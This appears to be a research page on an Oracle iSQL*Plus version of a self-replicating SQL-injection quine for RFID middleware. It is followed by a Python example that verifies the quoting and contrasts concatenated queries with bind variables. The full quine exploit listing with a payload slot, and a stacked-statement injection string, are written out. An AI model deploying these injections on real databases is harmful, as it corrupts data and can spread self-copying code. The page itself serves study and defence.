
SQL Virus Using Quines for Oracle (iSQL*Plus)


The Oracle exploit (Exploit 1) is functionally similar to the PostgreSQL version. The differences are explained below.
%content%' WHERE TagId='%id%';
CREATE FUNCTION a RETURN VARCHAR IS BEGIN RETURN 'UPDATE ContainerContents SET NewContents=''%content%'''' WHERE TagId=''''%id%'''';'' || CHR(10) || ''CREATE FUNCTION a RETURN VARCHAR IS BEGIN RETURN '''''' || replace(replace(a, '''''''', ''''''''''''), CHR(10), '''''' || CHR(10) || '''''') || ''''''; END;'' || CHR(10) || ''/'' || CHR(10) || a;' || CHR(10) || 'DROP FUNCTION a;' || CHR(10) || '%payload%' || CHR(10) || '--'; END;
/
UPDATE ContainerContents SET NewContents='%content%'' WHERE TagId=''%id%'';' || CHR(10) || 'CREATE FUNCTION a RETURN VARCHAR IS BEGIN RETURN ''' || replace(replace(a, '''', ''''''), CHR(10), ''' || CHR(10) || ''') || '''; END;' || CHR(10) || '/' || CHR(10) || a;
DROP FUNCTION a;
%payload%
--
Exploit 1 - Oracle (iSQL*Plus) exploit. Each line of the listing is one line of input; only these line breaks are significant.
The main difference from the PostgreSQL version is that iSQL*Plus is particular about the line breaks in the code. To handle this, the queries are extended to copy the line breaks; CHR(10) is an Oracle function that returns the newline character.

In the UPDATE statement, the code that creates the temporary function is written to the NewContents field. The body of the function is built using the function created on the second line, as in the PostgreSQL query. In this case, however, the function returns a string containing newlines. This string is processed with the replace function, which first doubles the single quotes and then replaces each newline with ' || CHR(10) || '. This ensures that the code written to the database is an exact copy of the currently running query.

Finally, Oracle does not provide PostgreSQL's quote_literal function, so replace is used instead. PostgreSQL's quote_literal encloses the string in quotes, but replace does not; therefore the call to trim is not needed.
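The following is an added example, not code from this page or from the RFID-virus project. It does two things: it checks the quoting rule the text describes (quotes doubled first, then each newline turned into ' || CHR(10) || ') by evaluating the resulting literal expression back to the original string, and it shows the application-side fix for the whole class of problem, bind variables, beside the string concatenation the exploit depends on. sqlite3 stands in for Oracle and iSQL*Plus (an assumption: it accepts stacked statements through executescript, and supports `--` comments, which is all the comparison needs); the table and column names come from the page, while the tag reads, the `MARKER` payload and every function name here are constructed for the example.

```python
"""Oracle-literal quoting check and bind-variable comparison (added example).

sqlite3 is used in place of Oracle; the quoting functions are plain string
manipulation and do not need a database at all.
"""
import sqlite3

NEWLINE_SPLICE = "' || CHR(10) || '"


def escape_for_oracle_literal(text: str) -> str:
    """The double replace() from the exploit: ' -> '' first, then newline -> ' || CHR(10) || '.

    The order matters: the splice inserts single quotes, so doubling quotes
    afterwards would corrupt it. The result goes between the enclosing quotes
    of a literal; unlike PostgreSQL's quote_literal, the quotes are not added.
    """
    return text.replace("'", "''").replace("\n", NEWLINE_SPLICE)


def evaluate_literal_expression(expr: str) -> str:
    """Evaluate a  '...' || CHR(10) || '...'  expression the way SQL would.

    Minimal checker for the forms escape_for_oracle_literal produces: quoted
    literals with '' as an escaped quote, CHR(10) as a newline, || as concat.
    """
    out, i, n = [], 0, len(expr)
    while i < n:
        c = expr[i]
        if c.isspace() or c == "|":          # whitespace and the || operator
            i += 1
        elif c == "'":                        # quoted literal
            i += 1
            buf = []
            while True:
                if i >= n:
                    raise ValueError("unterminated literal")
                if expr[i] == "'":
                    if i + 1 < n and expr[i + 1] == "'":   # '' inside a literal
                        buf.append("'")
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(expr[i])
                i += 1
            out.append("".join(buf))
        elif expr.startswith("CHR(10)", i):   # newline function call
            out.append("\n")
            i += len("CHR(10)")
        else:
            raise ValueError(f"unexpected character {c!r} at offset {i}")
    return "".join(out)


def roundtrip_ok(text: str) -> bool:
    """True when quoting text and evaluating the literal gives text back."""
    return evaluate_literal_expression("'" + escape_for_oracle_literal(text) + "'") == text


# Constructed sample reads: one benign tag, and one whose data closes the
# string literal and stacks a second statement (a harmless marker, not the quine).
SCHEMA = "CREATE TABLE ContainerContents (TagId TEXT PRIMARY KEY, NewContents TEXT);"
BENIGN_READ = ("tag-1", "milk, 12 cartons")
HOSTILE_READ = ("tag-2", "x' WHERE TagId='tag-2'; UPDATE ContainerContents SET NewContents='MARKER'; --")


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA + "INSERT INTO ContainerContents VALUES ('tag-1',''),('tag-2','');")
    return conn


def store_unsafely(conn, tag_id: str, content: str) -> None:
    """String concatenation, as the exploited application does. executescript
    mirrors a batch runner such as iSQL*Plus that executes several statements."""
    conn.executescript(
        f"UPDATE ContainerContents SET NewContents='{content}' WHERE TagId='{tag_id}';")


def store_safely(conn, tag_id: str, content: str) -> None:
    """Bind variables: the driver never lets tag data become part of the SQL text."""
    conn.execute("UPDATE ContainerContents SET NewContents=? WHERE TagId=?", (content, tag_id))
    conn.commit()


def contents(conn) -> dict:
    return dict(conn.execute("SELECT TagId, NewContents FROM ContainerContents ORDER BY TagId"))


def demo_unsafe() -> dict:
    """Hostile read through concatenation: the stacked UPDATE hits every row."""
    conn = fresh_db()
    store_unsafely(conn, *HOSTILE_READ)
    return contents(conn)                 # {'tag-1': 'MARKER', 'tag-2': 'MARKER'}


def demo_safe() -> dict:
    """Same read through a bind variable: stored verbatim, other rows untouched."""
    conn = fresh_db()
    store_safely(conn, *HOSTILE_READ)
    return contents(conn)                 # {'tag-1': '', 'tag-2': HOSTILE_READ[1]}


if __name__ == "__main__":
    print("round trip:", roundtrip_ok("NewContents='%content%'\n/\n-- a || b"))
    print("concatenated:", demo_unsafe())
    print("bound:", demo_safe())
```

The round-trip check is the property the text relies on: evaluating the quoted copy yields exactly the string that was quoted, which is why the code written into the database is byte-for-byte the running query. The second half is the practical point for the middleware: with bind variables the reader's data can contain quotes, semicolons and comment markers and still lands in NewContents as data, so the escaping question never arises on the application side.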


Last modified: Thursday, 02 March 2006 15:13, CET